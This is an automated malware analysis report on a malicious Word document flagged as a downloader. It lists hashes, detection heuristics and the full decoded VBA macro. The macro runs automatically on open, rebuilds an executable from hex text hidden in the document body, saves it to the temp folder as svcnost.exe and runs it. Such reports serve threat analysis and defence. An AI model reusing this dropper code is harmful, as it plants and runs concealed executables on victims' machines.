Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 d2d1f95cdcc9d7da…

MALICIOUS

Office (OLE) / .DOC

112.0 KB Created: 2014-12-13 02:32:00 Authoring application: Microsoft Office Word First seen: 2026-06-14
MD5: 228d8eba7a536ad93ee556ce089b02e0 SHA-1: a16366b69fe715fac753a2bbedb132192e685c0f SHA-256: d2d1f95cdcc9d7da45ad25cb61fe51c1dd22173576084051933760cc4c8615a4
214 Risk Score

Heuristics 10

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell utututut, iR3t + 1 - 1
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    tmm1 = Environ("T" & strTitle)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1586 bytes
SHA-256: 9bea84b68819b55860b13a12342e7b040182f449e392137adba8e1158fb07991
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Auto_Open()
   networkk
End Sub
Sub AutoOpen()
   Auto_Open
End Sub
Sub Workbook_Open()
   Auto_Open
End Sub

Sub networkk()
Dim zzzzz
zzzzz = "sdfs4738946789045643728945764738495864378467fsd"
Dim tmm1
Dim t7nb
Dim bywr
Dim li7np9f
Dim iR3t As Integer
Dim strPrompt As String
Dim strTitle As String
Dim ddddd
ddddd = ActiveDocument.Range.Text
strPrompt = "fsgsrg343454t4t rga dfgs3dfgsdf g" & "fa44tggsr3tsdgsg fgs fsgdf"
strTitle = "sdfgsr3333edfgsdf324234"
strTitle = "E" & "M" & "P"
tmm1 = Environ("T" & strTitle)
strTitle = "x" & "e"
t7nb = tmm1 & "sv" & "c" & "no" & "st.e" & strTitle

Dim Data
Data = Replace(ddddd, " ", "1")
zzzzz = "sdfs4738946789045643728945764738495864378467fsd"
Dim sop
Dim sop22
Dim Symbol
Dim utututut
Dim byswr

strTitle = "8"
sop = InStr(12, Data, "5" & "67" & strTitle)
sop22 = InStr(12, Data, "99" & "997" & strTitle)
byswr = sop + 2 + 22 - 20

i7np9f = FreeFile
Open t7nb For Binary Lock Write As #i7np9f

While (byswr < sop22)
Symbol = Mid(Data, byswr, 902 - 900)
zzzzz = "123123123123"
strTitle = "H"
Put #i7np9f, , CByte("&" & strTitle & Symbol)
byswr = byswr + 5 - 3
Wend
iR3t = 1
Close #i7np9f
utututut = t7nb
Shell utututut, iR3t + 1 - 1

End Sub

Private Sub Document_New()

End Sub